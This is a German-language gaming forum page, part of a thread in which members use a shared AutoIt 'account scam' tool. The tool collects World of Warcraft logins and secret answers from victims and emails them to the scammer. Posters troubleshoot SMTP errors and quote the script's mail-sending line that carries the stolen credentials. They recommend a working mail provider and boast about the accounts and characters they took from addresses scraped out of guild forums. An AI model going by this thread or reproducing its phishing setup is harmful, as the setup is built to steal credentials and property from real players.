Register for your free account! | Forgot your password?

Go Back   elitepvpers > World of Warcraft > WoW Exploits, Hacks, Tools & Macros
You last visited: Today at 19:56

  • Please register to post and access all features, it's quick, easy and FREE!

 

Accountscam mit Autoit Script und Fakemail.

Closed Thread
 
Old   #151
 
elite*gold: 0
Join Date: Feb 2008
Posts: 44
Received Thanks: 4
ich verstehe worauf du hinauswillst, aber wenn ich sogar geheimfrage und allerlei habe dann dürfte das für ihn aber schwer werden oder ??
Naja ich probiers mal aus und lass es euch wissen .. habe nochn paar Keys hier !!



Uffie is offline  
Old   #152
 
elite*gold: 0
Join Date: Sep 2006
Posts: 2,704
Received Thanks: 249
nein, er hat sie ja auch , und was du bei deinem transfer acc hast is ja scheiss egal, es geht nur um den Account den du gescammt hast. Und da hat er wohlmöglich noch cdkey + bankleihzahl und schon hast du verloren, oder er schickt seinen perso ein.


Reckoning is offline  
Old   #153
 
elite*gold: 0
Join Date: Feb 2008
Posts: 44
Received Thanks: 4
Jaah aber um den acc gehts mir ja garnich .. es geht mir um den einen char den ich auf den neuen acc transferiert habe !! ... was is damit ?? kann der dann wieder gelöscht werden ??
Uffie is offline  
Old   #154
 
elite*gold: 0
Join Date: Sep 2006
Posts: 2,704
Received Thanks: 249
der wird nicht gelöscht, der wird dann zurück transferiert und du hast sicher mit viel ärger zurechnen, ist halt deine sache wie risikobreit du bist, es ist gering aber denn noch hoch ~~


Reckoning is offline  
Old   #155
 
elite*gold: 0
Join Date: Feb 2008
Posts: 44
Received Thanks: 4
Was meinst du jetzt mit "viel ärger" ??? was kann denn einem da blühen Oo ??
Uffie is offline  
Old   #156
 
elite*gold: 0
Join Date: Dec 2007
Posts: 30
Received Thanks: 14
Wirklich ne lustige Sache und gut erklärt.
Habe vor 10 Tagen ca. 20 Mails geschickt, ist leider noch keine zurückgekommen
Wenn jemand einen Account übrig hat, der darf mir gerne eine PN schicken

Danke für das Tutorial!

MfG
Jolina is offline  
Old   #157
 
elite*gold: 20
Join Date: Sep 2007
Posts: 609
Received Thanks: 148
ich bekomm jedes mal ne fehlermeldung

kann das an etwas anderem liegen? firewall oder ähnliches? (wobei meine firewall es nicht blockt)
Gink is offline  
Old   #158
 
elite*gold: 20
Join Date: Sep 2007
Posts: 609
Received Thanks: 148
Quote:
Originally Posted by run32.dll View Post
Hallo Sordi

sag mal kommt der Name zufällig aus dem klassischem Adventure "Simon the Sorccerer"!? - dort heißt der böse Zauberer "Sordit" ^^

Habe ein kleines Problem mit dem script...
Ich habe mir 2 emailadressen angelegt zum testen, einmal bei "yahoo.de" und einmal "mail.com".

Dann habe ich den Code angepasst bei ...
Code:
 = _INetSmtpMailCom("smtp.mail.yahoo.de", , "<E-Mail hier>", "<E-Mail hier>", "WoWAccount", , "", "", "", "<Benutzername für E-Mail Account>", "<Password für E-Mail>", 25, 0)
zu:
Code:
 = _INetSmtpMailCom("smtp.mail.yahoo.de", , "", "", "WoWAccount", , "", "", "", "meinusername", "meinpw", 25, 0)
Dann habe ich das ganze compiliert (ohne Fehler), ausgeführt, testaccname+testpw eingegeben, geheimfrage eingegeben, dann erhalte ich diese Fehlermeldung:



Ich vermute mal das mit dem Mail versenden was nicht klappt oder?!
Habe die Mailadressen mit "<...>" und ohne probiert.
Welche der Adressen ist den der Absender und welche der Empfänger? Die erste im Code der Empfänger?
genau dieses problem hab ich auch, aber woran liegt das? hab die antowrten gelesen aber irgendwie nix passendes gefunden.
Gink is offline  
Old   #159
 
elite*gold: 0
Join Date: Nov 2006
Posts: 834
Received Thanks: 414
Googlemail, Lycos, Web, GMX, Yahoo
Funktioniert alles nicht. Bekomme überall die gleiche Fehlermeldung mit Line 1 ...

;( Schade
Zentral is offline  
Old   #160
 
elite*gold: 20
Join Date: Sep 2007
Posts: 609
Received Thanks: 148
dito
Gink is offline  
Old   #161
 
elite*gold: 0
Join Date: Jun 2007
Posts: 11
Received Thanks: 2
bei mir kommt wenn ch dann die final exe teste, autoit error :

Line -1:
Error: the Requested action within this object has failed. vllt hab ich auch irgnd wie die emailadresse von mir falsch rein gepastet...und da wo steht benutzername und email passwort sind meine daten? es ist cool das du sowas public released, aber ich raffs iwie ned, immer kommt dieses error, waere nett wenn mal wer n kompletten guide macht wie man das verhindert, fuer die dummen hier xD hab yahoo, hotmail, und googlemail getestet bisher danke mfg kshhh
krushah is offline  
Old   #162
 
elite*gold: 0
Join Date: Nov 2006
Posts: 834
Received Thanks: 414
Mit AOL klappts
smtp.de.aol.com
Zentral is offline  
Old   #163
 
elite*gold: 20
Join Date: Sep 2007
Posts: 609
Received Thanks: 148
werds mal testen, hoffentlich klappts
dann bekommst mein thx ^^

EDIT: hat geklappt danke
Gink is offline  
Old   #164
 
elite*gold: 97
Join Date: Jun 2007
Posts: 2,246
Received Thanks: 4,850
Bei nur 20 E-Mails die ich mal schnell aus einem Gildenforum kopiert habe, einen ganz netten Account mit 2 70ern und 8k Gold erwischt
Getraut mir selber Gold zuzuschicken habe ich mich dann doch nicht... dafür steckt in meinem Account zu viel Zeit

Najo mal schauen, Passwort ist von mir nicht geändert wurden, so habe ich noch etwas länger was vom Account
Cencil is offline  
Old   #165
 
elite*gold: 0
Join Date: Dec 2007
Posts: 278
Received Thanks: 35
Das erste mal gleich mal versucht und mit 25 emails:
Hunter 70
Schurke 62
Schamane 70
Schurke 62
Krieger 70
Hexer 70 s3 !
Jäger 70 und 64
Schurke 64
Krieger 70 s3
Jäger 70 t5

merci


<3 Ashen is offline  
Closed Thread



« Previous Thread | Next Thread »

Similar Threads
Accountscam mit Autoit Script und Fakemail...
Kann mir vllt. mal wer so ne e-mail schicken will wissen wie das so aussieht pls an : [email protected]
4 Replies - WoW Exploits, Hacks, Tools & Macros



All times are GMT +1. The time now is 19:56.


Powered by vBulletin®
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Abuse
Copyright ©2017 elitepvpers All Rights Reserved.